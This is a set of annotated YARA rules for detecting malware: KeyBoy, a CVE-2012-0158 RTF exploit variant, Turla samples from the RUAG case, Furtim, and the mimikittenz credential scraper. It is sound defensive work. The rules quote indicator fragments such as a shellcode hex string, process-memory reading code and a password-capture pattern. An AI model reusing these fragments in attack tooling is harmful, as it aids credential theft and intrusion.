              uint16(0) == 0x5A4D and

              //PE signature
              uint32(uint32(0x3C)) == 0x00004550 and
              filesize < 200KB and
              7 of them
      }
// Targets a document that carries its embedded OLE object as hex TEXT (the form used by
// RTF \objdata); all five strings are required.
//   $a - the OLE compound-file magic D0 CF 11 E0 A1 B1 1A E1 written out as hex characters
//   $b - a long run of "ff" hex characters (padding/junk)
//   $c - the hex characters of UTF-16LE "Root Entry" (52 00 6F 00 6F 00 74 00 20 00 45 00
//        6E 00 74 00 72 00 79 00), with optional RTF "{\b0}" groups and spaces allowed
//        between fragments - i.e. the name may be split to defeat plain substring matching
//   $d - ProgID of the MSCOMCTL ListView control, the component implicated in CVE-2012-0158
//   $e - hex characters of the decoder stub (per the author's comment)
rule CVE_2012_0158_KeyBoy {
        meta:
            author = "Etienne Maynier <etienne@citizenlab.ca>"
            description = "CVE-2012-0158 variant"
            file = "8307e444cad98b1b59568ad2eba5f201"

        strings:
            $a = "d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff09000600000000000000000000000100000001" nocase // OLE header
            $b = "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff" nocase // junk data
            $c = /5(\{\\b0\}|)[ ]*2006F00(\{\\b0\}|)[ ]*6F007(\{\\b0\}|)[ ]*400200045(\{\\b0\}|)[ ]*006(\{\\b0\}|)[ ]*E007(\{\\b0\}|)[ ]*400720079/ nocase
            $d = "MSComctlLib.ListViewCtrl.2"
            $e = "ac38c874503c307405347aaaebf2ac2c31ebf6e8e3" nocase //decoding shellcode

        condition:
            all of them
      }
// Matches KeyBoy's file-transfer error/log messages. Gate: "MZ" at 0, "PE\0\0" at
// e_lfanew, file under 200 KB, then the "Error2" token plus any 3 of the $s* messages
// (ASCII or UTF-16LE). $s4 and $s15 are the same text under two names; $s22's "[%s}"
// bracket mismatch is in the sample and must be kept as-is.
rule keyboy_errors
      {
          meta:
              author = "Matt Brooks, @cmatthewbrooks"
              desc = "Matches the sample's shell error2 log statements"
              date = "2016-08-28"
              md5 = "495adb1b9777002ecfe22aaf52fcee93"

          strings:
              //These strings are in ASCII pre-2015 and UNICODE in 2016
              $error = "Error2" ascii wide
              //2016 specific:
              $s1 = "Can't find [%s]!Check the file name and try again!" ascii wide
              $s2 = "Open [%s] error! %d" ascii wide
              $s3 = "The Size of [%s] is zero!" ascii wide
              $s4 = "CreateThread DownloadFile[%s] Error!" ascii wide
              $s5 = "UploadFile [%s] Error:Connect Server Failed!" ascii wide
              $s6 = "Receive [%s] Error(Recved[%d] != Send[%d])!" ascii wide
              $s7 = "Receive [%s] ok! Use %2.2f seconds, Average speed %2.2f k/s" ascii wide
              $s8 = "CreateThread UploadFile[%s] Error!" ascii wide
              //Pre-2016:
              $s9 = "Ready Download [%s] ok!" ascii wide
              $s10 = "Get ControlInfo from FileClient error!" ascii wide
              $s11 = "FileClient has a error!" ascii wide
              $s12 = "VirtualAlloc SendBuff Error(%d)" ascii wide
              $s13 = "ReadFile [%s] Error(%d)..." ascii wide
              $s14 = "ReadFile [%s] Data[Readed(%d) != FileSize(%d)] Error..." ascii wide
              $s15 = "CreateThread DownloadFile[%s] Error!" ascii wide
              $s16 = "RecvData MyRecv_Info Size Error!" ascii wide
              $s17 = "RecvData MyRecv_Info Tag Error!" ascii wide
              $s18 = "SendData szControlInfo_1 Error!" ascii wide
              $s19 = "SendData szControlInfo_3 Error!" ascii wide
              $s20 = "VirtualAlloc RecvBuff Error(%d)" ascii wide
              $s21 = "RecvData Error!" ascii wide
              $s22 = "WriteFile [%s} Error(%d)..." ascii wide

          condition:
              //MZ header
              uint16(0) == 0x5A4D and

              //PE signature
              uint32(uint32(0x3C)) == 0x00004550 and
              filesize < 200KB and
              $error and 3 of ($s*)
      }
// Matches KeyBoy's 2016 command vocabulary. All strings are UTF-16LE only ("wide") and
// whole-word ("fullword"). Most are ordinary English words, so the specificity comes from
// the combination: PE gate (MZ + "PE\0\0" at e_lfanew), file under 200 KB, and at least
// 6 of the 12 words present.
rule keyboy_commands
      {
          meta:
              author = "Matt Brooks, @cmatthewbrooks"
              desc = "Matches the 2016 sample's sent and received commands"
              date = "2016-08-28"
              md5 = "495adb1b9777002ecfe22aaf52fcee93"

          strings:
              $s1 = "Update" wide fullword
              $s2 = "UpdateAndRun" wide fullword
              $s3 = "Refresh" wide fullword
              $s4 = "OnLine" wide fullword
              $s5 = "Disconnect" wide fullword
              $s6 = "Pw_Error" wide fullword
              $s7 = "Pw_OK" wide fullword
              $s8 = "Sysinfo" wide fullword
              $s9 = "Download" wide fullword
              $s10 = "UploadFileOk" wide fullword
              $s11 = "RemoteRun" wide fullword
              $s12 = "FileManager" wide fullword

          condition:
              //MZ header
              uint16(0) == 0x5A4D and

              //PE signature
              uint32(uint32(0x3C)) == 0x00004550 and
              filesize < 200KB and
              6 of them
      }
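rule new_keyboy_header_codes
{
    // Seven 3-character protocol markers ("*l*", "*a*", ...), UTF-16LE and whole-word only.
    // All seven must be present in a PE ("MZ" at 0, "PE\0\0" at e_lfanew) under 200 KB.
    meta:
        author = "Matt Brooks, @cmatthewbrooks"
        desc = "Matches the 2016 sample's header codes"
        date = "2016-08-28"
        md5 = "495adb1b9777002ecfe22aaf52fcee93"

    strings:
        $s1 = "*l*" wide fullword
        $s2 = "*a*" wide fullword
        $s3 = "*s*" wide fullword
        $s4 = "*d*" wide fullword
        $s5 = "*f*" wide fullword
        $s6 = "*g*" wide fullword
        $s7 = "*h*" wide fullword

    condition:
        //MZ header //PE signature
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and filesize < 200KB and all of them
}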
// https://otx.alienvault.com/pulse/5936f79bc8787f6cbabf34cd
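rule RUAG_Cobra_Malware
{
    // PDB-path indicator gated on an "MZ" header; ASCII only.
    meta:
        description = "Detects a malware mentioned in the RUAG Case called Carbon/Cobra"
        author = "Florian Roth"
        reference = "https://goo.gl/N5MEj0"
        score = 60

    strings:
        $s1 = "\\Cobra\\Release\\Cobra.pdb" ascii

    condition:
        uint16(0) == 0x5a4d and $s1
}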
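rule RUAG_Bot_Config_File
{
    // Tiny INI-style config: "[CONFIG]" must be at offset 0, the other two keys anywhere,
    // and the file is under 160 bytes (no KB suffix - the limit is in bytes).
    meta:
        description = "Detects a specific config file used by malware in RUAG APT case"
        author = "Florian Roth"
        reference = "https://goo.gl/N5MEj0"
        score = 60

    strings:
        $s1 = "[CONFIG]" ascii
        $s2 = "name = " ascii
        $s3 = "exe = cmd.exe" ascii

    condition:
        $s1 at 0 and $s2 and $s3 and filesize < 160
}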
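rule RUAG_Cobra_Config_File
{
    // INI-style config: "[NAME]" at offset 0, 8 of the 10 section/key names, under 5 KB.
    // Several of these keys ("system_pipe", "[TRANSPORT]") recur in RUAG_Exfil_Config_File.
    meta:
        description = "Detects a config text file used by malware Cobra in RUAG case"
        author = "Florian Roth"
        reference = "https://goo.gl/N5MEj0"
        score = 60

    strings:
        $h1 = "[NAME]" ascii
        $s1 = "object_id=" ascii
        $s2 = "[TIME]" ascii fullword
        $s3 = "lastconnect" ascii
        $s4 = "[CW_LOCAL]" ascii fullword
        $s5 = "system_pipe" ascii
        $s6 = "user_pipe" ascii
        $s7 = "[TRANSPORT]" ascii
        $s8 = "run_task_system" ascii
        $s9 = "[WORKDATA]" ascii
        $s10 = "address1" ascii

    condition:
        $h1 at 0 and 8 of ($s*) and filesize < 5KB
}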
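rule Turla_APT_Malware_Gen3
{
    // Two paths: a PE under 2000 KB with one high-confidence $x* string or 6 of the $s*
    // strings, or - regardless of header/size - 10 of all 17 strings.
    // NOTE(review): hash9 repeats hash3 (same SHA-256); eight distinct samples are listed.
    meta:
        description = "Detects Turla malware (based on sample used in the RUAG APT case)"
        author = "Florian Roth"
        family = "Turla"
        reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
        date = "2016-06-09"
        hash1 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"
        hash2 = "b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4"
        hash3 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"
        hash4 = "8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a"
        hash5 = "8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98"
        hash6 = "0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f"
        hash7 = "2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2"
        hash8 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"
        hash9 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"

    strings:
        /* High-confidence: named pipe and operator-facing config/error messages */
        $x1 = "\\\\.\\pipe\\sdlrpc" fullword ascii
        $x2 = "WaitMutex Abandoned %p" fullword ascii
        $x3 = "OPER|Wrong config: no port|" fullword ascii
        $x4 = "OPER|Wrong config: no lastconnect|" fullword ascii
        $x5 = "OPER|Wrong config: empty address|" fullword ascii
        $x6 = "Trans task %d obj %s ACTIVE fail robj %s" fullword ascii
        $x7 = "OPER|Wrong config: no auth|" fullword ascii
        $x8 = "OPER|Sniffer '%s' running... ooopppsss...|" fullword ascii
        /* Supporting: registry paths, benign-looking hostnames, URL/format strings */
        $s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Post Platform" fullword ascii
        $s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Pre Platform" fullword ascii
        $s3 = "www.yahoo.com" fullword ascii
        $s4 = "MSXIML.DLL" fullword wide
        $s5 = "www.bing.com" fullword ascii
        $s6 = "%s: http://%s%s" fullword ascii
        $s7 = "/javascript/view.php" fullword ascii
        $s8 = "Task %d failed %s,%d" fullword ascii
        $s9 = "Mozilla/4.0 (compatible; MSIE %d.0; " fullword ascii

    condition:
        ( uint16(0) == 0x5a4d and filesize < 2000KB and ( 1 of ($x*) or 6 of ($s*) ) ) or ( 10 of them )
}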
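rule Turla_APT_Malware_Gen1
{
    // Two paths: a PE under 2000 KB with 2 of the $x* strings or 8 of the $s* strings,
    // or - regardless of header/size - 12 of all 14 strings.
    // $s2-$s8 are names of packet-capture tools; a file listing them is consistent with
    // the sample checking for analysis/sniffing software, but they are also legitimate
    // names, hence the high thresholds.
    meta:
        description = "Detects Turla malware (based on sample used in the RUAG APT case)"
        author = "Florian Roth"
        family = "Turla"
        reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
        date = "2016-06-09"
        hash1 = "0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4"
        hash2 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"
        hash3 = "fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd"
        hash4 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"
        hash5 = "b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4"
        hash6 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"
        hash7 = "8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a"
        hash8 = "8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98"
        hash9 = "0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f"
        hash10 = "2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2"

    strings:
        $x1 = "too long data for this type of transport" fullword ascii
        $x2 = "not enough server resources to complete operation" fullword ascii
        $x3 = "Task not execute. Arg file failed." fullword ascii
        $x4 = "Global\\MSCTF.Shared.MUTEX.ZRX" fullword ascii
        $s1 = "peer has closed the connection" fullword ascii
        $s2 = "tcpdump.exe" fullword ascii
        $s3 = "windump.exe" fullword ascii
        $s4 = "dsniff.exe" fullword ascii
        $s5 = "wireshark.exe" fullword ascii
        $s6 = "ethereal.exe" fullword ascii
        $s7 = "snoop.exe" fullword ascii
        $s8 = "ettercap.exe" fullword ascii
        $s9 = "miniport.dat" fullword ascii
        $s10 = "net_password=%s" fullword ascii

    condition:
        ( uint16(0) == 0x5a4d and filesize < 2000KB and ( 2 of ($x*) or 8 of ($s*) ) ) or ( 12 of them )
}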
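rule Turla_APT_srsvc
{
    // Small service DLL: a PE under 20 KB with the export-DLL name ($x1) or all four
    // $s* strings, or all five strings regardless of header/size.
    // There is intentionally no $s1; numbering starts at $s2.
    meta:
        description = "Detects Turla malware (based on sample used in the RUAG APT case)"
        author = "Florian Roth"
        family = "Turla"
        reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
        date = "2016-06-09"
        hash1 = "65996f266166dbb479a42a15a236e6564f0b322d5d68ee546244d7740a21b8f7"
        hash2 = "25c7ff1eb16984a741948f2ec675ab122869b6edea3691b01d69842a53aa3bac"

    strings:
        $x1 = "SVCHostServiceDll.dll" fullword ascii
        $s2 = "msimghlp.dll" fullword wide
        $s3 = "srservice" fullword wide
        $s4 = "ModStart" fullword ascii
        $s5 = "ModStop" fullword ascii

    condition:
        ( uint16(0) == 0x5a4d and filesize < 20KB and ( 1 of ($x*) or all of ($s*) ) ) or ( all of them )
}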
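rule Turla_APT_Malware_Gen2
{
    // Two paths: a PE under 2000 KB with one $x* string or 5 of the $s* strings,
    // or - regardless of header/size - 10 of all 17 strings.
    // $s6 ("\\.\Global\PIPE\") is a prefix of $x7; both are declared and counted separately.
    meta:
        description = "Detects Turla malware (based on sample used in the RUAG APT case)"
        author = "Florian Roth"
        family = "Turla"
        reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
        date = "2016-06-09"
        hash1 = "0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4"
        hash2 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"
        hash3 = "fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd"
        hash4 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"

    strings:
        /* High-confidence: log-format strings and named pipes */
        $x1 = "Internal command not support =((" fullword ascii
        $x2 = "L|-1|AS_CUR_USER:OpenProcessToken():%d, %s|" fullword ascii
        $x3 = "L|-1|CreateProcessAsUser():%d, %s|" fullword ascii
        $x4 = "AS_CUR_USER:OpenProcessToken():%d" fullword ascii
        $x5 = "L|-1|AS_CUR_USER:LogonUser():%d, %s|" fullword ascii
        $x6 = "L|-1|try to run dll %s with user priv|" fullword ascii
        $x7 = "\\\\.\\Global\\PIPE\\sdlrpc" fullword ascii
        $x8 = "\\\\%s\\pipe\\comnode" fullword ascii
        $x9 = "Plugin dll stop failed." fullword ascii
        $x10 = "AS_USER:LogonUser():%d" fullword ascii
        /* Supporting: module names and pipe prefix */
        $s1 = "MSIMGHLP.DLL" fullword wide
        $s2 = "msimghlp.dll" fullword ascii
        $s3 = "ximarsh.dll" fullword ascii
        $s4 = "msximl.dll" fullword ascii
        $s5 = "INTERNAL.dll" fullword ascii
        $s6 = "\\\\.\\Global\\PIPE\\" fullword ascii
        $s7 = "ieuser.exe" fullword ascii

    condition:
        ( uint16(0) == 0x5a4d and filesize < 2000KB and ( 1 of ($x*) or 5 of ($s*) ) ) or ( 10 of them )
}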
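rule RUAG_Exfil_Config_File
{
    // INI-style transport config: "[TRANSPORT]" at offset 0, all five keys, under 1 KB.
    meta:
        description = "Detects a config text file used in data exfiltration in RUAG case"
        author = "Florian Roth"
        reference = "https://goo.gl/N5MEj0"
        score = 60

    strings:
        $h1 = "[TRANSPORT]" ascii
        $s1 = "system_pipe" ascii
        $s2 = "spstatus" ascii
        $s3 = "adaptable" ascii
        $s4 = "post_frag" ascii
        $s5 = "pfsgrowperiod" ascii

    condition:
        $h1 at 0 and all of ($s*) and filesize < 1KB
}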
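rule RUAG_Tavdig_Malformed_Executable
{
    // No strings section: purely structural. uint32() reads little-endian, so
    // 0x0000AD0B means the bytes 0B AD 00 00 sit where "PE\0\0" (50 45 00 00) would
    // normally be at e_lfanew - a deliberately corrupted PE signature.
    meta:
        description = "Detects an embedded executable with a malformed header - known from Tavdig malware"
        author = "Florian Roth"
        reference = "https://goo.gl/N5MEj0"
        score = 60

    condition:
        /* MZ Header and malformed PE header > 0x0bad */
        uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x0000AD0B
}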
// https://otx.alienvault.com/pulse/588f30792f464907f45629f8
// https://otx.alienvault.com/pulse/5975e808097211677f362a3c
rule Furtim_nativeDLL {
    meta:
        description = "Detects Furtim malware - file native.dll"
        author = "Florian Roth"
        reference = "MISP 3971"
        date = "2016-06-13"
        hash1 = "4f39d3e70ed1278d5fa83ed9f148ca92383ec662ac34635f7e56cc42eeaee948"
    strings:
        // sample-specific ASCII token
        $s1 = "FqkVpTvBwTrhPFjfFF6ZQRK44hHl26" fullword ascii
        // opcode sequences
        $op0 = { e0 b3 42 00 c7 84 24 ac }
        $op1 = { a1 e0 79 44 00 56 ff 90 10 01 00 00 a1 e0 79 44 }
        $op2 = { bf d0 25 44 00 57 89 4d f0 ff 90 d4 02 00 00 59 }
    condition:
        // Parentheses spell out the precedence ("and" binds tighter than "or"):
        // the token needs the MZ/size gate, the complete opcode set matches on its own.
        ( uint16(0) == 0x5a4d and filesize < 900KB and $s1 ) or all of ($op*)
}
rule Furtim_Parent_1 {
    meta:
        description = "Detects Furtim Parent Malware"
        author = "Florian Roth"
        reference = "https://sentinelone.com/blogs/sfg-furtims-parent/"
        date = "2016-07-16"
        hash1 = "766e49811c0bb7cce217e72e73a6aa866c15de0ba11d7dda3bd7e9ec33ed6963"
    strings:
        // RC4 encryption password (author's annotation)
        $x1 = "dqrChZonUF" fullword ascii
        // version-info style wide strings
        $s1 = "Egistec" fullword wide
        $s2 = "Copyright (C) 2016" fullword wide
        // opcode sequences
        $op1 = { c0 ea 02 88 55 f8 8a d1 80 e2 03 }
        $op2 = { 5d fe 88 55 f9 8a d0 80 e2 0f c0 }
        $op3 = { c4 0c 8a d9 c0 eb 02 80 e1 03 88 5d f8 8a d8 c0 }
    condition:
        // gated branch: the password alone, or every wide string together with every opcode;
        // ungated branch: the full string set regardless of header and size
        (
            uint16(0) == 0x5a4d and filesize < 900KB and
            ( $x1 or ( all of ($s*) and all of ($op*) ) )
        )
        or all of them
}
rule sig_5783b35b2eace55a5762df27fcb0b0fb28371b3e {
    // YarGen output. The $s strings appear to be byte runs of the kind found in
    // relocation blocks (low-value indicators); the opcode strings carry the rule.
    // $op0 is the same byte sequence used in Furtim_nativeDLL.
    meta:
        description = "Auto-generated rule - file 5783b35b2eace55a5762df27fcb0b0fb28371b3e.codex"
        author = "YarGen Rule Generator"
        reference = "not set"
        date = "2016-07-21"
        hash1 = "72513534f2e0f3e77a22023b887df3718c9df70686eb0ae58cbbde2f90f447e4"
    strings:
        $s1 = "B+P:\\6" fullword ascii
        $s2 = "6.666K6S6d6l6}6" fullword ascii
        $s3 = "0!0&0+0<0A0F0W0\\0a0n0z0" fullword ascii
        $s4 = ";#;);.;:;@;E;Q;W;\\;h;q;v;" fullword ascii
        $s5 = "2#2-222F2L2W2\\2b2g2x2~2" fullword ascii
        $s6 = "9\"9)90979>9E9L9S9Z9k9}9" fullword ascii
        $s7 = "6-747;7B7I7P7W7^7e7l7s7z7" fullword ascii
        $s8 = "4\"4'43494>4J4P4U4a4g4l4x4" fullword ascii
        $s9 = ":#:(:4:::?:K:T:Y:e:k:p:|:" fullword ascii
        $s10 = "WD.hyA" fullword ascii
        $s11 = "<\"<)<0<7<><E<L<S<Z<a<h<" fullword ascii
        $s12 = "=&=,=1=>=D=I=V=_=d=q=w=|=" fullword ascii
        $s13 = "; ;(;0;8;@;H;P;X;`;h;p;{;" fullword ascii
        $s14 = "<\"<)<0<7<><E<L<S<Z<a<h<o<v<" fullword ascii
        $s15 = "6#6(616;6@6I6S6X6d6n6s6|6" fullword ascii
        $s16 = "(%r-c;u" fullword ascii
        $s17 = "3%3G3N3U3\\3c3j3q3x3" fullword ascii
        $s18 = "7\"767T7[7b7i7p7w7~7" fullword ascii
        $s19 = "1 1-1>1C1P1a1f1s1" fullword ascii
        $s20 = "8 8&8,8A8M8^8d8i8" fullword ascii

        $op0 = { e0 b3 42 00 c7 84 24 ac }
        $op1 = { a1 e0 79 44 00 57 ff 75 1c ff 90 78 01 00 00 83 }
        $op2 = { 3c ee 42 00 c7 84 24 8c }
    condition:
        // gated: MZ magic, size cap, ten of the text strings and at least one opcode;
        // ungated: everything at once
        (
            uint16(0) == 0x5a4d and filesize < 900KB and
            10 of ($s*) and 1 of ($op*)
        )
        or all of them
}
rule sig_7acb8d6d4c062c3097a7d31df103bc4d018519f9 {
    // YarGen output. The $s strings appear to be byte runs of the kind found in
    // relocation blocks (low-value indicators); the opcode strings carry the rule.
    meta:
        description = "Auto-generated rule - file 7acb8d6d4c062c3097a7d31df103bc4d018519f9.codex"
        author = "YarGen Rule Generator"
        reference = "not set"
        date = "2016-07-21"
        hash1 = "e1607486cbb2d111d5df314fe58948aa0dc5897f56f7fd763c62bb30651380e3"
    strings:
        $s1 = "5(666Z6c6" fullword ascii
        $s2 = "Wlm;y%UD%d" fullword ascii
        $s3 = ";1;9;@;G;N;U;\\;c;j;q;x;" fullword ascii
        $s4 = "8 8'8.858<8C8J8Q8X8_8f8m8t8" fullword ascii
        $s5 = "2 2,282=2B2G2P2U2Z2_2h2s2x2" fullword ascii
        $s6 = "4'5.555<5C5J5Q5X5_5f5m5t5{5" fullword ascii
        $s7 = "0#0*01080?0F0M0T0[0b0i0p0w0" fullword ascii
        $s8 = "6$6,616=6B6G6S6X6]6i6n6s6" fullword ascii
        $s9 = "=\"=)=0=7=>=E=L=S=Z=a=h=" fullword ascii
        $s10 = "6&6-646;6B6I6P6W6^6e6l6s6z6" fullword ascii
        $s11 = "O.QrH@" fullword ascii
        $s12 = ">\">/>4>A>F>S>X>e>j>w>|>" fullword ascii
        $s13 = "0#0(040=0B0N0T0Y0e0k0p0|0" fullword ascii
        $s14 = "5)5/545@5F5K5W5`5e5q5w5|5" fullword ascii
        $s15 = "=!=&=3=8=E=N=S=`=e=s=x=}=" fullword ascii
        $s16 = ":(:/:6:=:D:K:R:Y:`:g:n:u:|:" fullword ascii
        $s17 = "7\"727<7F7M7W7a7k7u7" fullword ascii
        $s18 = "2+21262E2K2P2\\2h2m2|2" fullword ascii
        $s19 = ";/;5;:;G;V;\\;a;n;};" fullword ascii
        $s20 = ";\";-;8;C;N;^;i;t;" fullword ascii

        $op0 = { ff 44 24 14 8d 47 44 50 a1 08 63 44 00 ff 90 84 }
        $op1 = { 6d 43 00 c7 84 24 10 03 00 00 0c 6d 43 00 c7 84 }
        $op2 = { c7 43 0c 20 02 00 00 89 5d f0 ff 90 f8 }
    condition:
        // gated: MZ magic, size cap, ten of the text strings and at least one opcode;
        // ungated: everything at once
        (
            uint16(0) == 0x5a4d and filesize < 900KB and
            10 of ($s*) and 1 of ($op*)
        )
        or all of them
}
rule d4fe01ea13cf9926c2cf51d0ffbd78f9a110f4b9 {
    // YarGen output. The $s strings appear to be byte runs of the kind found in
    // relocation blocks (low-value indicators); the opcode strings carry the rule.
    meta:
        description = "Auto-generated rule - file d4fe01ea13cf9926c2cf51d0ffbd78f9a110f4b9.codex"
        author = "YarGen Rule Generator"
        reference = "not set"
        date = "2016-07-21"
        hash1 = "d1dc9b2905264da34dc97d6c005810fbcc99be1a6b4b41f883bb179dbcacba6e"
    strings:
        $s1 = ":&:-:=:J:O:\\:m:r:" fullword ascii
        $s2 = "6)6/666;6N6W6^6c6t6y6" fullword ascii
        $s3 = "666Q6V6b6g6~6" fullword ascii
        $s4 = "0%0,010A0F0K0\\0a0f0w0|0" fullword ascii
        $s5 = "6!6(63686E6J6W6\\6i6n6{6" fullword ascii
        $s6 = "3 3%33383=3J3R3`3e3o3t3~3" fullword ascii
        $s7 = "4 4'40454:4G4M4R4_4e4j4w4" fullword ascii
        $s8 = "1#1(141=1B1N1T1Y1e1k1p1|1" fullword ascii
        $s9 = "?(?2?<?C?J?Q?X?_?f?m?t?{?" fullword ascii
        $s10 = "?#?*?1?8???F?M?T?[?b?i?p?w?" fullword ascii
        $s11 = "6)6/646@6F6K6W6]6b6n6w6|6" fullword ascii
        $s12 = "4#40454:4G4L4Q4^4c4h4u4z4" fullword ascii
        $s13 = "<\"<'<3<8<=<I<N<S<_<d<i<u<z<" fullword ascii
        $s14 = ">%>/>9>@>G>N>U>\\>c>j>q>" fullword ascii
        $s15 = "WTZDAE" fullword ascii
        $s16 = "060>0E0K0P0\\0b0g0v0|0" fullword ascii
        $s17 = "4#4-474A4K4U4\\4f4p4z4" fullword ascii
        $s18 = "7\"7,767@7J7T7^7h7q7{7" fullword ascii
        $s19 = ";\";';4;E;J;W;k;p;};" fullword ascii
        $s20 = ";0;;;F;Q;\\;g;r;};" fullword ascii

        $op0 = { a1 b8 63 44 00 83 c4 14 53 ff 75 14 56 57 ff 90 }
        $op1 = { 8b d8 8b 45 08 8b 40 3a 81 c3 00 10 00 00 03 c3 }
        $op2 = { 5c 2d 44 00 c7 84 24 c0 }
    condition:
        // gated: MZ magic, size cap, ten of the text strings and at least one opcode;
        // ungated: everything at once
        (
            uint16(0) == 0x5a4d and filesize < 900KB and
            10 of ($s*) and 1 of ($op*)
        )
        or all of them
}
rule sig_2fb404bdcebc7acbeb598f8a2ddbecf48c60b113 {
    // YarGen output for the same sample hash that Furtim_nativeDLL lists as hash1;
    // $op0 is shared with that rule as well. The $s strings appear to be byte runs
    // of the kind found in relocation blocks (low-value indicators).
    meta:
        description = "Auto-generated rule - file 2fb404bdcebc7acbeb598f8a2ddbecf48c60b113.codex"
        author = "YarGen Rule Generator"
        reference = "not set"
        date = "2016-07-21"
        hash1 = "4f39d3e70ed1278d5fa83ed9f148ca92383ec662ac34635f7e56cc42eeaee948"
    strings:
        $s1 = ":%:0:;:F:Q:\\:p:|:" fullword ascii
        $s2 = "6.666>6F6N6V6^6f6n6v6~6" fullword ascii
        $s3 = "6!6(6/666=6D6K6R6Y6r6:7" fullword ascii
        $s4 = "1t83jL.bjG" fullword ascii
        $s5 = "6!61666V6]6p6" fullword ascii
        $s6 = "2%2D2P2`2p2|2" fullword ascii
        $s7 = "42494@4G4N4U4\\4c4j4q4x4" fullword ascii
        $s8 = "9+92999@9G9N9U9\\9c9j9q9x9" fullword ascii
        $s9 = "4!4&43484E4J4W4\\4i4n4s4" fullword ascii
        $s10 = "5$5+52595@5G5N5U5\\5c5j5q5" fullword ascii
        $s11 = "1.252<2C2J2Q2X2_2f2m2t2{2" fullword ascii
        $s12 = "8 8%818:8?8K8Q8V8b8h8m8y8" fullword ascii
        $s13 = "9'93989=9B9K9P9U9Z9c9n9s9" fullword ascii
        $s14 = ":\":':,:8:=:B:R:Z:`:e:v:}:" fullword ascii
        $s15 = "=#=(=4=:=?=K=Q=V=b=k=p=|=" fullword ascii
        $s16 = "= =*=1=8=?=F=M=T=[=b=i=p=w=~=" fullword ascii
        $s17 = "3&3-343;3B3I3P3W3^3e3l3s3z3" fullword ascii
        $s18 = ":!:(:/:6:=:I:N:S:`:f:k:x:~:" fullword ascii
        $s19 = "cMDkAjy=" fullword ascii
        $s20 = "=#=/=4=9=E=J=O=[=`=e=q=v={=" fullword ascii

        $op0 = { e0 b3 42 00 c7 84 24 ac }
        $op1 = { 3c ee 42 00 c7 84 24 8c }
        $op2 = { a1 e0 79 44 00 83 c4 0c ff 74 24 1c ff 90 3c 01 }
    condition:
        // gated: MZ magic, size cap, ten of the text strings and at least one opcode;
        // ungated: everything at once
        (
            uint16(0) == 0x5a4d and filesize < 900KB and
            10 of ($s*) and 1 of ($op*)
        )
        or all of them
}
// https://otx.alienvault.com/pulse/55c11d0d4637f20b68c108c2
// https://otx.alienvault.com/pulse/56048efa4637f21ecf296f8b
// https://otx.alienvault.com/pulse/582b40dead98a7282b2854f5
rule Invoke_mimikittenz {
    // PowerShell script that embeds C# P/Invoke code for reading process memory.
    meta:
        description = "Detects Mimikittenz - file Invoke-mimikittenz.ps1"
        author = "Florian Roth"
        reference = "https://github.com/putterpanda/mimikittenz"
        date = "2016-07-19"
        score = 90
        hash1 = "14e2f70470396a18c27debb419a4f4063c2ad5b6976f429d47f55e31066a5e6a"
    strings:
        // tool-specific class name, sufficient on its own
        $x1 = "[mimikittenz.MemProcInspector]" ascii

        // supporting fragments of the embedded interop / regex code
        $s1 = "PROCESS_ALL_ACCESS = PROCESS_TERMINATE | PROCESS_CREATE_THREAD | PROCESS_SET_SESSIONID | PROCESS_VM_OPERATION |" fullword ascii
        $s2 = "IntPtr processHandle = MInterop.OpenProcess(MInterop.PROCESS_WM_READ | MInterop.PROCESS_QUERY_INFORMATION, false, process.Id);" fullword ascii
        $s3 = "&email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=" ascii
        $s4 = "[DllImport(\"kernel32.dll\", SetLastError = true)]" fullword ascii
    condition:
        // 0x7566 read little-endian is the two bytes "fu" at offset 0 (presumably the
        // start of "function"); any two strings suffice behind that gate
        $x1 or ( uint16(0) == 0x7566 and filesize < 60KB and 2 of them )
}
